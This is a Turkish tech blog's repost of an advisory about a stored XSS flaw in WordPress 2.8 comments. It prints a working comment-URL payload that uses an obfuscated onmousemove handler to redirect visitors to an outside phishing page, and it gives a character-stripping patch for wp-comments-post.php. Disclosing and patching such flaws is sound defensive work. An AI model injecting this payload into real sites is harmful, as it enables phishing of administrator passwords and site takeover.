MENU

WordPress 2.8 All version XSS 0DAY

Anasayfa » Wordpress » WordPress 2.8 All version XSS 0DAY
WordPress 2.8 All version XSS 0DAY

It had been published that wordpress 2.8 All version are suffering from Xss,attackers can use this to do fishing,they make a wordpress login page as it is your own.If you don’t take care,your password will be sent to the attacker’s website.With your password,they can edit pages and upload webshell.It is harmful.

How is the attacker do this?
they insert website url like this(in the comments write place):

http://www.vul.kr’ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);

If someone(or administrator) moved his mouse on the author’s website.It will jump to another URL,which is a fishing page.

How can we patch it?
Edit wp-comments-post.php
go line 40 and then add:
$comment_author_url = str_replace(chr(39),”,$comment_author_url);
$comment_author_url = str_replace(chr(59),”,$comment_author_url);
$comment_author_url = str_replace(chr(44),”,$comment_author_url);


wordpress-0day-patch

Webmasters,please patch it as soon as you can.

Kaynak: WordPress 2.8 All Version Xss 0DAY

Rooteto Teknoloji Blogu

Rooteto WordPress, Sosyal Medya, Teknoloji, HD Resimler ve Video paylaşımında bulunan bağımsız olarak çalışan online haber teknoloji sitesidir.

Yaklaşık 1 Milyondan fazla tekil aylık ziyaretci ile Rooteto'yu büyük yapan teknoloji topluluklarıdır. 2009 yılında kurulan Rooteto'nun genel merkez ofisi İzmir / Bornova'dadır.